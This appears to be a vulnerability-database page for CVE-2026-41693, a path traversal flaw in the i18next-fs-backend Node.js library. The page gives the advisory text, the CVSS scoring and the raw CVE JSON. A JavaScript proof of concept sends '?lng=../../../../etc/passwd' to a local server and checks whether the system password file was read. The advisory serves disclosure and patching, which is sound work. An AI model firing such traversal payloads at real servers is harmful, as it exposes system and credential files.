Security Vulnerability Report
CVE-2026-41693 CVSS 8.2 HIGH

CVE-2026-41693

Published: 2026-05-08 16:16:12
Last Modified: 2026-05-08 16:16:12

Description

i18next-fs-backend is a backend layer for i18next, for use in Node.js and Deno, that loads translations from the filesystem. Prior to version 2.6.4, i18next-fs-backend substitutes the lng and ns options directly into the configured loadPath / addPath templates and then reads / writes the resulting file from disk. The interpolation is unencoded and unvalidated, so a crafted lng or ns value — containing .., a path separator, a control character, a prototype key, or simply an unexpectedly long string — allows an attacker who can influence either value to read or overwrite files outside the intended locale directory. When lng / ns are derived from untrusted input (request-scoped i18next instances behind an HTTP layer such as i18next-http-middleware, or any framework that lets the end user pick the language via query string, cookie, or header), a single request such as ?lng=../../../../etc/passwd causes the backend to attempt to read that path. This issue has been patched in version 2.6.4.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

i18next-fs-backend < 2.6.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// PoC: Path Traversal in i18next-fs-backend < 2.6.4
// This PoC demonstrates reading /etc/passwd by manipulating the 'lng' parameter.
const http = require('http');

const targetHost = 'localhost';
const targetPort = 3000;
const path = '/translations'; // Endpoint using i18next-fs-backend

// Malicious payload to traverse directories
const maliciousLng = '../../../../etc/passwd';

const options = {
  hostname: targetHost,
  port: targetPort,
  path: `${path}?lng=${maliciousLng}`,
  method: 'GET'
};

const req = http.request(options, (res) => {
  console.log(`Status: ${res.statusCode}`);
  console.log(`Headers: ${JSON.stringify(res.headers)}`);
  res.setEncoding('utf8');
  res.on('data', (chunk) => {
    console.log(`Body: ${chunk}`);
    // Check if the response contains content from /etc/passwd
    if (chunk.includes('root:') || chunk.includes('nobody:')) {
      console.log('[+] Vulnerability confirmed: Successfully read file outside intended directory.');
    }
  });
});

req.on('error', (e) => {
  console.error(`Request error: ${e.message}`);
});

req.end();

References

https://github.com/i18next/i18next-fs-backend/security/advisories/GHSA-8847-338w-5hcj
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-41693",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-08T16:16:11.613",
    "lastModified": "2026-05-08T16:16:11.613",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "i18next-fs-backend is a backend layer for i18next using in Node.js and for Deno to load translations from the filesystem. Prior to version 2.6.4, i18next-fs-backend substitutes the lng and ns options directly into the configured loadPath / addPath templates and then read / write the resulting file from disk. The interpolation is unencoded and unvalidated, so a crafted lng or ns value — containing .., a path separator, a control character, a prototype key, or simply an unexpectedly long string — allows an attacker who can influence either value to read or overwrite files outside the intended locale directory. When lng / ns are derived from untrusted input (request-scoped i18next instances behind an HTTP layer such as i18next-http-middleware, or any framework that lets the end user pick the language via query string, cookie, or header), a single request such as ?lng=../../../../etc/passwd causes the backend to attempt to read that path. This issue has been patched in version 2.6.4."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 4.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          { "lang": "en", "value": "CWE-22" },
          { "lang": "en", "value": "CWE-73" }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/i18next/i18next-fs-backend/security/advisories/GHSA-8847-338w-5hcj",
        "source": "[email protected]"
      }
    ]
  }
}